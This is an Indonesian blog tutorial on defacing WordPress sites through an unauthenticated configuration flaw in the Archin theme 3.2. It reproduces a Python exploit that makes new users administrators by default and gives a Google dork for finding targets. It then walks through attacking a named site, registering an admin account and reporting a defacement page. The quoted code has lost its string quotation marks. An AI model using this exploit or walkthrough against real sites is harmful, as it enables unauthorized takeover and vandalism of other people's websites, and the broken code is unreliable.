Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability
Oke, langsung saja ya bro, soalnya ane buru-buru mau malem mingguan :v . Ane prakteknya di Windows, jadi yang pakek linux ngikutin aja sebisanya. Bagi yang pake windows, wajib install Python dulu. Sttelah itu, buka notepad, dan pastekan script berikut :
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib
#target site
site = target website
#path to ajax.php
url = /wp-content/themes/yvora/hades_framework/option_panel/ajax.php
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {Content-type: application/x-www-form-urlencoded, Accept: text/plain}
conn = httplib.HTTPConnection(site)
conn.request(POST, url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
ChangeOption(site, url, admin_email, emailmu)
ChangeOption(site, url, users_can_register, 1)
ChangeOption(site, url, default_role, administrator)
print Now register a new user, they are an administrator by default!
Save di direktori C: dengan nama archin.py (untuk memudahkan saja)
Langkah selanjutnya, dorking di google dengan dork berikut :
/wp-content/themes/vithy/hades_framework/ (kembangkan sendiri)
Setelah nemu target, coba di ctrl + u .
Lalu edit archin.py , sesuaikan dengan target diatas 😀
ganti situs.com dengan basement-pa.de
ganti archin dengan vithy
ganti akicha@jkt48-cyber.org dengan email anda
ganti shintanaomi dengan user keinginan anda. :p
Langkah selanjutnya, buka CMD, lalu ketik cd
Setelah itu, ketik lagi archin.py
Tunggu sampai proses selesai 😀
Sekarang buka http://www.basement-pa.de/wp-login.php?action=register
Masukkan data, dan cek email , maka anda akan mendapat password nya 😀
Sekarang coba login dengan user dan password yang didapat 😀
Login sukses :v
Tapi bangke ni situs gak bisa edit themes -_-
Install plugins juga gak bisa :3
jadi ya gini aja deh 😀
http://www.basement-pa.de/hacked/
Sekian dan terimakasih 😀
Thanks to : Gay MUHAMMAD TAREGH AZZIS
Sumber http://noob1t4.blogspot.com/
Sekian Artikel Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini
0 Response to "Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability"
Posting Komentar